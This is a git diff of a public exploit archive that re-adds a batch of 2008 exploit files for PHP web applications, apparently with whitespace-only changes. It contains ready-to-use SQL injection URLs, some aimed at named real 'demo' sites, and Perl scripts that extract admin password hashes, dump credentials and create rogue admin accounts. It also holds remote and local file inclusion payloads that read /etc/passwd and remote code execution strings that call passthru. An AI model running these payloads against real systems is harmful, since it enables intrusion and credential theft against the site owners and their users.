@@ -1,39 +1,39 @@ -[~]------------------------------------------------------------------------------ -[~] Fez software Version 1.3 AND 2.0 RC1 (list.php) - SQL Injection Vulnerability -[~] -[~] http://sourceforge.net/projects/fez -[~] -[~] About:- [Fez is an open source project to produce and maintain a highly flexible web interface to FEDORA -[~] for any Library or Institution to configure and publish or archive documents of any type sustainably.] -[~] -[~] ---------------------------------------------------------- -[~] Bug founded by d3v1l -[~] -[~] Date: 22.09.2008 -[~] -[~] -[~] d3v1l@spoofer.com -[~] -[~] ----------------------------------------------------------- -[~] Greetz tO:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest|Gibon|Pig and milw0rm Staff -[~]------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* -[~] -[~] Demo :- 1.3 -[~] -[~] http://repository.openpolytechnic.ac.nz/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* -[~] -[~] -[~] Demo :- 2.0 RC1 -[~] -[~] http://avi.lib.cas.cz/sandbox/fex/trunk/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* -[~] -[~]----------------------------------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-09-22] +[~]------------------------------------------------------------------------------ +[~] Fez software Version 1.3 AND 2.0 RC1 (list.php) - SQL Injection Vulnerability +[~] +[~] http://sourceforge.net/projects/fez +[~] +[~] About:- [Fez is an open source project to produce and maintain a highly flexible web interface to FEDORA +[~] for any Library or Institution to configure and publish or archive documents of any type sustainably.] 
+[~] +[~] ---------------------------------------------------------- +[~] Bug founded by d3v1l +[~] +[~] Date: 22.09.2008 +[~] +[~] +[~] d3v1l@spoofer.com +[~] +[~] ----------------------------------------------------------- +[~] Greetz tO:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest|Gibon|Pig and milw0rm Staff +[~]------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* +[~] +[~] Demo :- 1.3 +[~] +[~] http://repository.openpolytechnic.ac.nz/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* +[~] +[~] +[~] Demo :- 2.0 RC1 +[~] +[~] http://avi.lib.cas.cz/sandbox/fex/trunk/list.php?browse=subject&parent_id=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user())/* +[~] +[~]----------------------------------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-09-22] diff --git a/platforms/php/webapps/6536.pl b/platforms/php/webapps/6536.pl index a8510b32a..5dec6b508 100755 --- a/platforms/php/webapps/6536.pl +++ b/platforms/php/webapps/6536.pl 
@@ -1,60 +1,60 @@ -#!/usr/bin/perl -# -# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection -# -# found and coded by -SmoG- /\GermAn hAckZ0r -# contact: ICQ - 266836394 -# -# -# -# -# hints: - sometimes the parameter "SID" is different to the normal one... -# - i extract the hash from the html-code... but i was 2 lazy for coding a good working filter -# - salted DES (normaly "aa" will be the salt, but it can be different) -# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback... -# -# -# >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<< - -use LWP::UserAgent; - -if ($#ARGV+1 !=1) { -print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n"; -print "found and coded by -SmoG-\n"; -print "\n\nUsage: perl xploit.pl -victim\n"; -print " perl xploit.pl http://gayxboy.com/\n\n"; #LiVe-Dem0! letZz pwnz the pedophile!! -exit(); -} -print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n"; -print "\nstarting exploit..."; -$target=$ARGV[0]; -chomp($target); -if($target !~ /^http:\/\//) -{ - $target = "http://".$target; -} -if($target !~ /\/$/) -{ - $target .= "/"; -} -@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*"); -$ua = LWP::UserAgent->new; -$ua->timeout(10); -$ua->env_proxy; -$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"); -$response = $ua->get($target, @header); -if ($response->is_success) -{ -$temp = $response->content; -if ($temp =~/(.*)SID=(.*);/) - { - $result=substr($temp,85,13); - print "\n\adminhash: "; print $result; - } -} -else -{ - die "Error: ".$response->status_line; -} - -# milw0rm.com [2008-09-22] +#!/usr/bin/perl +# +# CJ Ultra Plus <= v1.0.4 Cookie SQL Injection +# +# found and coded by -SmoG- /\GermAn hAckZ0r +# contact: ICQ - 266836394 +# +# +# +# +# hints: - sometimes the parameter "SID" is different to the normal one... +# - i extract the hash from the html-code... 
but i was 2 lazy for coding a good working filter +# - salted DES (normaly "aa" will be the salt, but it can be different) +# - ive spend about 1 hour for this source... its my first exploit in perl... so plz be friendly with ur feedback... +# +# +# >>> GretzZz 2: pronoobz.org - Wesker, China Sun and all other memberZz <<< + +use LWP::UserAgent; + +if ($#ARGV+1 !=1) { +print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n"; +print "found and coded by -SmoG-\n"; +print "\n\nUsage: perl xploit.pl -victim\n"; +print " perl xploit.pl http://gayxboy.com/\n\n"; #LiVe-Dem0! letZz pwnz the pedophile!! +exit(); +} +print "\n### CJ Ultra Plus <= v1.0.4 Cookie SQL Injection Exploit###\n"; +print "\nstarting exploit..."; +$target=$ARGV[0]; +chomp($target); +if($target !~ /^http:\/\//) +{ + $target = "http://".$target; +} +if($target !~ /\/$/) +{ + $target .= "/"; +} +@header = ('Cookie' => "SID='UNION SELECT b12 from settings/*"); +$ua = LWP::UserAgent->new; +$ua->timeout(10); +$ua->env_proxy; +$ua->agent("Mozilla/5.0 (Windows; U; Windows NT 5.1; nl; rv:1.8.1.12) Gecko/20080201 Firefox/2.0.0.12"); +$response = $ua->get($target, @header); +if ($response->is_success) +{ +$temp = $response->content; +if ($temp =~/(.*)SID=(.*);/) + { + $result=substr($temp,85,13); + print "\n\adminhash: "; print $result; + } +} +else +{ + die "Error: ".$response->status_line; +} + +# milw0rm.com [2008-09-22] diff --git a/platforms/php/webapps/6538.txt b/platforms/php/webapps/6538.txt index 31d549cef..3af4c3b3f 100755 --- a/platforms/php/webapps/6538.txt +++ b/platforms/php/webapps/6538.txt 
@@ -1,39 +1,38 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ##################################################################### - # [ OpenRat <= 0.8-beta4 ] Remote File Inclusion Vulnerability # - ##################################################################### - # - # Script: "OpenRat is a free Web Content-Management-System." - # - # Script site: http://www.openrat.de/ - # Download: http://www.openrat.de/download/ - # http://dl.openrat.de/openrat-cvs-2007-12-05.tar.gz - # - # Vuln: http://site.com/openrat/themes/default/include/html/insert.inc.php?tpl_dir=[spread???] - # - # - # Bug: ./openrat/themes/default/include/html/insert.inc.php - # - # ... - # - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-23] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ##################################################################### + # [ OpenRat <= 0.8-beta4 ] Remote File Inclusion Vulnerability # + ##################################################################### + # + # Script: "OpenRat is a free Web Content-Management-System." + # + # Script site: http://www.openrat.de/ + # Download: http://www.openrat.de/download/ + # http://dl.openrat.de/openrat-cvs-2007-12-05.tar.gz + # + # Vuln: http://site.com/openrat/themes/default/include/html/insert.inc.php?tpl_dir=[spread???] + # + # + # Bug: ./openrat/themes/default/include/html/insert.inc.php + # + # ... + # + # ... 
+ # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-23] diff --git a/platforms/php/webapps/6539.txt b/platforms/php/webapps/6539.txt index 2fab83c05..9d7077f04 100755 --- a/platforms/php/webapps/6539.txt +++ b/platforms/php/webapps/6539.txt 
@@ -1,40 +1,39 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - ######################################################################### - # [ Sofi WebGui <= 0.6.3 PRE ] Remote File Inclusion Vulnerability # - ######################################################################### - # - # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu - # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz - # - # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???] - # - # - # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26) - # - # ... - # if($ff=="") $ff = "index"; - # $file_name = "m_$ff.php"; - # - # //start web module - # include("$mod_dir/$file_name"); // RFI - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-23] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + ######################################################################### + # [ Sofi WebGui <= 0.6.3 PRE ] Remote File Inclusion Vulnerability # + ######################################################################### + # + # Script site: http://www.muskatli.net/studio/hu/?f=sofi-wgui-hu + # Download: http://www.muskatli.net/site/files/news_data/100004_100192_sofi_webgui_0.6.0.pre-release-3.tar.gz + # + # Vuln: http://site.com/sofi_webgui/hu/modules/reg-new/modstart.php?mod_dir=[spread???] 
+ # + # + # Bug: ./sofi_webgui/hu/modules/reg-new/modstart.php (line: 26) + # + # ... + # if($ff=="") $ff = "index"; + # $file_name = "m_$ff.php"; + # + # //start web module + # include("$mod_dir/$file_name"); // RFI + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-23] diff --git a/platforms/php/webapps/6540.pl b/platforms/php/webapps/6540.pl index b9d65fa36..7945f186e 100755 --- a/platforms/php/webapps/6540.pl +++ b/platforms/php/webapps/6540.pl 
@@ -1,49 +1,49 @@ -#!/usr/bin/perl -# ---------------------------------------------------------- -# iGaming <= 1.5 Multiple Remote SQL Injection Exploit -# Perl Exploit - Output: id:admin:password -# Discovered On: 23/09/2008 -# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it -# Proud To Be Italian -# ---------------------------------------------------------- -# Usage: perl exploit.pl http://localhost/iGaming -# ---------------------------------------------------------- - -use strict; -use LWP::UserAgent; - -my ($one,$two,$exec,$host,$http,$xxx,$view); - -$view = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*"; -$exec = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*"; -$host = shift @ARGV; -$http = new LWP::UserAgent or die $!; -$http->agent("Mozilla/4.5 [en] (Win95; U)"); -$http->timeout(1); - - -if($host !~ /^http:\/\/(.+?)$/) -{ - print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n"; - print "[?] 
Usage: perl $0 http://[path]\n"; - exit; -} -else -{ - $one = $http->get($host.'/previews.php?browse='.$exec); - $two = $http->get($host.'/reviews.php?browse='.$exec); - $xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view); - - if($one->is_success or $two->is_success or $xxx->is_success) - { - die "$1\n" if $one->content =~ /%(.+?)%/; - die "$1\n" if $two->content =~ /%(.+?)%/; - die "$1\n" if $xxx->content =~ /%(.+?)%/; - } - else - { - die "[+] Exploit Failed!\n"; - } -} - -# milw0rm.com [2008-09-23] +#!/usr/bin/perl +# ---------------------------------------------------------- +# iGaming <= 1.5 Multiple Remote SQL Injection Exploit +# Perl Exploit - Output: id:admin:password +# Discovered On: 23/09/2008 +# Discovered By: StAkeR - StAkeR[at]hotmail[dot]it +# Proud To Be Italian +# ---------------------------------------------------------- +# Usage: perl exploit.pl http://localhost/iGaming +# ---------------------------------------------------------- + +use strict; +use LWP::UserAgent; + +my ($one,$two,$exec,$host,$http,$xxx,$view); + +$view = "'%20union%20select%200,0,1,2,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),0,6,7,8%20from%20sp_members%20WHERE%20id='1/*"; +$exec = "'%20union%20select%201,concat(0x25,id,0x3a,pseudo,0x3a,pass,0x25),3%20from%20sp_members%20where%20id='1/*"; +$host = shift @ARGV; +$http = new LWP::UserAgent or die $!; +$http->agent("Mozilla/4.5 [en] (Win95; U)"); +$http->timeout(1); + + +if($host !~ /^http:\/\/(.+?)$/) +{ + print "[?] iGaming CMS <= 1.5 Multiple Remote SQL Injection Exploit\n"; + print "[?] 
Usage: perl $0 http://[path]\n"; + exit; +} +else +{ + $one = $http->get($host.'/previews.php?browse='.$exec); + $two = $http->get($host.'/reviews.php?browse='.$exec); + $xxx = $http->get($host.'/index.php?do=viewarticle&id='.$view); + + if($one->is_success or $two->is_success or $xxx->is_success) + { + die "$1\n" if $one->content =~ /%(.+?)%/; + die "$1\n" if $two->content =~ /%(.+?)%/; + die "$1\n" if $xxx->content =~ /%(.+?)%/; + } + else + { + die "[+] Exploit Failed!\n"; + } +} + +# milw0rm.com [2008-09-23] diff --git a/platforms/php/webapps/6541.txt b/platforms/php/webapps/6541.txt index e25e6d787..79dc5d04b 100755 --- a/platforms/php/webapps/6541.txt +++ b/platforms/php/webapps/6541.txt 
@@ -1,24 +1,24 @@ -################################################################################### -## Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload -## Script : http://downloads.sourceforge.net/galmetapost -## You Can Get Multiple Local File Inclusion Vulnerabilities To This Script -## From Here http://www.milw0rm.com/exploits/5944 By CWH Underground -################################################################################### -################################################################################### -################################################################################### -## Vulns & POC : -## 1- Remote Code Execution Vulnerability In \_lib\adodb_lite\adodb-perf-module.inc.php -## In Line 20 : -## eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }'); -## ----------------------------------- -## Ex : /_lib/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);// -################################################################################### -################################################################################### -################################################################################### -## 2- (FCKeditor) Remote Arbitrary File Upload In \_lib\fckeditor\editor\filemanager\upload\test.html -## ----------------------------------- -## Ex : /_lib/fckeditor/editor/filemanager/upload/test.html -## Restrict And Grant Only Trusted Users Access To The Resources. 
-################################################################################### - -# milw0rm.com [2008-09-23] +################################################################################### +## Galmeta Post CMS <= 0.2 Remote Code Execution / Arbitrary File Upload +## Script : http://downloads.sourceforge.net/galmetapost +## You Can Get Multiple Local File Inclusion Vulnerabilities To This Script +## From Here http://www.milw0rm.com/exploits/5944 By CWH Underground +################################################################################### +################################################################################### +################################################################################### +## Vulns & POC : +## 1- Remote Code Execution Vulnerability In \_lib\adodb_lite\adodb-perf-module.inc.php +## In Line 20 : +## eval('class perfmon_parent_EXTENDER extends ' . $last_module . '_ADOConnection { }'); +## ----------------------------------- +## Ex : /_lib/adodb_lite/adodb-perf-module.inc.php?last_module=t{};%20class%20t{};passthru(ls);// +################################################################################### +################################################################################### +################################################################################### +## 2- (FCKeditor) Remote Arbitrary File Upload In \_lib\fckeditor\editor\filemanager\upload\test.html +## ----------------------------------- +## Ex : /_lib/fckeditor/editor/filemanager/upload/test.html +## Restrict And Grant Only Trusted Users Access To The Resources. +################################################################################### + +# milw0rm.com [2008-09-23] diff --git a/platforms/php/webapps/6542.txt b/platforms/php/webapps/6542.txt index e70bbf136..28ec83292 100755 --- a/platforms/php/webapps/6542.txt +++ b/platforms/php/webapps/6542.txt 
@@ -1,30 +1,30 @@ -[~]----------------------------------------------------------- -[~] JETIK-WEB Software v1 - SQL Injection Vulnerability -[~] -[~] http://www.jetik.net -[~] ---------------------------------------------------------- -[~] Bug founded by d3v1l -[~] -[~] Date: 22.09.2008 -[~] -[~] -[~] d3v1l@spoofer.com -[~] -[~] ----------------------------------------------------------- -[~] Greetz tO ALL:- -[~] -[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) -[~] -[~] Pentest| Gibon| Pig AND milw0rm staff -[~]------------------------------------------------------------- -[~] Exploit :- -[~] -[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/* -[~] -[~] Demo :- -[~] -[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/* -[~] -[~]-------------------------------------------------------------------------------------------------------------- - -# milw0rm.com [2008-09-23] +[~]----------------------------------------------------------- +[~] JETIK-WEB Software v1 - SQL Injection Vulnerability +[~] +[~] http://www.jetik.net +[~] ---------------------------------------------------------- +[~] Bug founded by d3v1l +[~] +[~] Date: 22.09.2008 +[~] +[~] +[~] d3v1l@spoofer.com +[~] +[~] ----------------------------------------------------------- +[~] Greetz tO ALL:- +[~] +[~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) +[~] +[~] Pentest| Gibon| Pig AND milw0rm staff +[~]------------------------------------------------------------- +[~] Exploit :- +[~] +[~] http://site.com/sayfa.php?kat=1 UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3/* +[~] +[~] Demo :- +[~] +[~] http://www.jetik.net/sayfa.php?kat=1%20UNION%20SELECT%201,concat_ws(0x3a,version(),database(),user()),3/* +[~] +[~]-------------------------------------------------------------------------------------------------------------- + +# milw0rm.com [2008-09-23] 
diff --git a/platforms/php/webapps/6543.txt b/platforms/php/webapps/6543.txt index bf4d5cc79..6d2d6eab4 100755 --- a/platforms/php/webapps/6543.txt +++ b/platforms/php/webapps/6543.txt 
@@ -1,41 +1,40 @@ - - :::::::-. ... ::::::. :::. - ;;, `';, ;; ;;;`;;;;, `;;; - `[[ [[[[' [[[ [[[[[. '[[ - $$, $$$$ $$$ $$$ "Y$c$$ - 888_,o8P'88 .d888 888 Y88 - MMMMP"` "YmmMMMM"" MMM YM - - [ Discovered by dun \ dun[at]strcpy.pl ] - - #################################################################### - # [ olbookmarks <= 0.7.5 ] Local File Inclusion Vulnerability # - #################################################################### - # - # Script site: http://sourceforge.net/project/showfiles.php?group_id=24742 - # - # Vuln: - # http://site.com/olbookmarks/show.php?show=../../../../../../../etc/passwd%00 - # - # - # Bug: ./olbookmarks-0.7.5/show.php - # - # ... - # if ($_REQUEST[root] != "" || $_REQUEST[lib] != "") exit; - # - # if ($_GET[show]!="") - # include("$root/$_GET[show].php"); - # else - # include("$lib/bookmarkslist_view.php"); - # ... - # - # - ############################################### - # Greetz: D3m0n_DE * str0ke * and otherz.. - ############################################### - - [ dun / 2008 ] - -******************************************************************************************* - -# milw0rm.com [2008-09-23] + :::::::-. ... ::::::. :::. + ;;, `';, ;; ;;;`;;;;, `;;; + `[[ [[[[' [[[ [[[[[. '[[ + $$, $$$$ $$$ $$$ "Y$c$$ + 888_,o8P'88 .d888 888 Y88 + MMMMP"` "YmmMMMM"" MMM YM + + [ Discovered by dun \ dun[at]strcpy.pl ] + + #################################################################### + # [ olbookmarks <= 0.7.5 ] Local File Inclusion Vulnerability # + #################################################################### + # + # Script site: http://sourceforge.net/project/showfiles.php?group_id=24742 + # + # Vuln: + # http://site.com/olbookmarks/show.php?show=../../../../../../../etc/passwd%00 + # + # + # Bug: ./olbookmarks-0.7.5/show.php + # + # ... 
+ # if ($_REQUEST[root] != "" || $_REQUEST[lib] != "") exit; + # + # if ($_GET[show]!="") + # include("$root/$_GET[show].php"); + # else + # include("$lib/bookmarkslist_view.php"); + # ... + # + # + ############################################### + # Greetz: D3m0n_DE * str0ke * and otherz.. + ############################################### + + [ dun / 2008 ] + +******************************************************************************************* + +# milw0rm.com [2008-09-23] diff --git a/platforms/php/webapps/6544.txt b/platforms/php/webapps/6544.txt index 393654d1b..cfe5f918b 100755 --- a/platforms/php/webapps/6544.txt +++ b/platforms/php/webapps/6544.txt @@ -1,15 +1,15 @@ -WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability -Download : http://webportal.ivanoculmine.com/download.php?mid=14 -Vuln : -###################################################################### - -###################################################################### -POC : -/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id); -###################################################################### - -# milw0rm.com [2008-09-23] +WebPortal <= 0.7.4 (code) Remote Code Execution Vulnerability +Download : http://webportal.ivanoculmine.com/download.php?mid=14 +Vuln : +###################################################################### + +###################################################################### +POC : +/index.php?m=admin&f=console&action=execute&code=(id);} passthru(id); +###################################################################### + +# milw0rm.com [2008-09-23] diff --git a/platforms/php/webapps/6545.txt b/platforms/php/webapps/6545.txt index 93572f99c..d5679741a 100755 --- a/platforms/php/webapps/6545.txt +++ b/platforms/php/webapps/6545.txt 
@@ -1,66 +1,66 @@ -|___________________________________________________| -| -| Hotscripts Clone (cid) Remote SQL Injection Vulnerability -| -|___________________________________________________ -|---------------------Hussin X----------------------| -| -| Author: Hussin X -| -| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC -| -| email: darkangel_g85[at]Yahoo[DoT]com -| -| -| -|___________________________________________________ -| | -| -| script : http://www.greatclone.com/product_info.php?cPath=31&products_id=81 -| -| DorK : inurl:add_soft.php -|___________________________________________________| - - -sbwmd_config:username_len -sbwmd_email_id:useremail -sbwmd_mailing_list:username -sbwmd_mailing_list:useremail -sbwmd_members:username -sbwmd_admin:pwd>freemagics -sbwmd_config:pwd_len -sbwmd_members:pwd -sbwmd_admin:admin_name -sbwmd_config:admin_email -sbwmd_softwares:admin_desc - - - - - -www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin-- - - -OR - - -www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin-- - - - - - - -____________________________( Greetz )_________________________________ -| -| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | -| -| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr -| -| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone -|______________________________________________________________________ - - - Im IRAQi - -# milw0rm.com [2008-09-24] +|___________________________________________________| +| +| Hotscripts Clone (cid) Remote SQL Injection Vulnerability +| +|___________________________________________________ +|---------------------Hussin X----------------------| +| +| Author: Hussin X +| +| Home : WwW.IQ-ty.CoM | WwW.TrYaG.CC +| +| email: darkangel_g85[at]Yahoo[DoT]com +| +| +| +|___________________________________________________ +| | +| +| script : 
http://www.greatclone.com/product_info.php?cPath=31&products_id=81 +| +| DorK : inurl:add_soft.php +|___________________________________________________| + + +sbwmd_config:username_len +sbwmd_email_id:useremail +sbwmd_mailing_list:username +sbwmd_mailing_list:useremail +sbwmd_members:username +sbwmd_admin:pwd>freemagics +sbwmd_config:pwd_len +sbwmd_members:pwd +sbwmd_admin:admin_name +sbwmd_config:admin_email +sbwmd_softwares:admin_desc + + + + + +www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5,6+FROM+sbwmd_admin-- + + +OR + + +www.[target].com/Script/showcategory.php?cid=-27+UNION+SELECT+1,concat(admin_name,0x3a,pwd),3,4,5+FROM+sbwmd_admin-- + + + + + + +____________________________( Greetz )_________________________________ +| +| All members of the Forum WwW.IQ-ty.CoM | WwW.TrYaG.CC | +| +| My friends : DeViL iRaQ | IRAQ DiveR | IRAQ_JAGUR | CraCkEr +| +| Ghost Hacker | FAHD | Iraqihack | jiko | str0ke | Cyber-Zone +|______________________________________________________________________ + + + Im IRAQi + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6546.pl b/platforms/php/webapps/6546.pl index 4e2bcadd9..e6ccf8601 100755 --- a/platforms/php/webapps/6546.pl +++ b/platforms/php/webapps/6546.pl 
@@ -1,61 +1,61 @@ -#!/usr/bin/perl -w - -# Rianxosencabos CMS 0.9 Remote Add Admin Exploit -# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz - -# written by ka0x -# D.O.M Labs - Security Researchers -# - www.domlabs.org - - -use LWP::UserAgent; - -my ($host, $login, $pass, $mail, $user_id) = @ARGV ; - -unless($ARGV[4]){ - print "[*] usage: perl $0 \n"; - print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n"; - exit 1; -} - -if ($host !~ /^http:/){ $host = 'http://'.$host; } - -my $ua = LWP::UserAgent->new() or die ; -$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ; -$ua->timeout(10) ; - -sub __CREATE { - - my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ; - $req->content_type('application/x-www-form-urlencoded') ; - $req->content("reg_login=".$login."®_pass=".$pass."®_repass=".$pass."®_nombre=".$login."®_mail=".$mail."&submit_register=Rexistrar") ; - - my $res = $ua->request($req) ; - my $location = $res->header('Location') ; - if ($location =~ /Usuario creado/i) { - print "[+] user added: ".$login ; - print "\n[+] password: ".$pass, "\n" ; - } - - else{ - print "[-] Exploit Failed!\n" ; - } -} - -&__CREATE ; - -sub __ADMIN { - my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; - - $req->content_type('application/x-www-form-urlencoded') ; - - $req->content($user_id."=0&inputOculto=".$user_id) ; - - $ua->request($req) ; -} - -&__ADMIN ; - - -__END__ - -# milw0rm.com [2008-09-24] +#!/usr/bin/perl -w + +# Rianxosencabos CMS 0.9 Remote Add Admin Exploit +# Download: http://downloads.sourceforge.net/rsccms/rsccms.tar.gz + +# written by ka0x +# D.O.M Labs - Security Researchers +# - www.domlabs.org - + +use LWP::UserAgent; + +my ($host, $login, $pass, $mail, $user_id) = @ARGV ; + +unless($ARGV[4]){ + print "[*] usage: perl $0 \n"; + print "[*] ex: perl $0 http://localhost/ ka0x 12345 ka0x01[at]gmail.com 2\n"; + exit 1; +} + +if 
($host !~ /^http:/){ $host = 'http://'.$host; } + +my $ua = LWP::UserAgent->new() or die ; +$ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008072820 Firefox/3.0.1") ; +$ua->timeout(10) ; + +sub __CREATE { + + my $req = HTTP::Request->new(POST => $host."index.php?s=usuarios&accion=registrar") ; + $req->content_type('application/x-www-form-urlencoded') ; + $req->content("reg_login=".$login."®_pass=".$pass."®_repass=".$pass."®_nombre=".$login."®_mail=".$mail."&submit_register=Rexistrar") ; + + my $res = $ua->request($req) ; + my $location = $res->header('Location') ; + if ($location =~ /Usuario creado/i) { + print "[+] user added: ".$login ; + print "\n[+] password: ".$pass, "\n" ; + } + + else{ + print "[-] Exploit Failed!\n" ; + } +} + +&__CREATE ; + +sub __ADMIN { + my $req = HTTP::Request->new(POST => $host."?s=admin&accion=lista") ; + + $req->content_type('application/x-www-form-urlencoded') ; + + $req->content($user_id."=0&inputOculto=".$user_id) ; + + $ua->request($req) ; +} + +&__ADMIN ; + + +__END__ + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6547.txt b/platforms/php/webapps/6547.txt index 8cbf6d1bf..c9bcba38e 100755 --- a/platforms/php/webapps/6547.txt +++ b/platforms/php/webapps/6547.txt 
@@ -1,20 +1,20 @@ -######################################### -Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities -######################################### -POC & Vulns -RFI In (frame.php) In Line 46 - include "$_GET[framefile]"; -######################################### -Ex : /frame.php?framefile=[Shell] -######################################### -LFI In (/read/frame.php) In Line 46 - include "../$_GET[framefile]"; -######################################### -Ex : /frame.php?framefile=../../../../../../etc/passwd -######################################### -SQL Injection In /read/index.php?name=brian&id= -Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences-- -######################################### -Thanx To .. Tryag.cc/cc ..And.. All Members In TryaG - -# milw0rm.com [2008-09-24] +######################################### +Ol Bookmarks Manager 0.7.5 RFI / LFI / SQL Injection Vulnerabilities +######################################### +POC & Vulns +RFI In (frame.php) In Line 46 + include "$_GET[framefile]"; +######################################### +Ex : /frame.php?framefile=[Shell] +######################################### +LFI In (/read/frame.php) In Line 46 + include "../$_GET[framefile]"; +######################################### +Ex : /frame.php?framefile=../../../../../../etc/passwd +######################################### +SQL Injection In /read/index.php?name=brian&id= +Ex : /read/index.php?name=brian&id=-0000008+union+select+1,2,3,4,password,login,7,8,9,10,12,11,13+from+preferences-- +######################################### +Thanx To .. Tryag.cc/cc ..And.. All Members In TryaG + +# milw0rm.com [2008-09-24] diff --git a/platforms/php/webapps/6549.txt 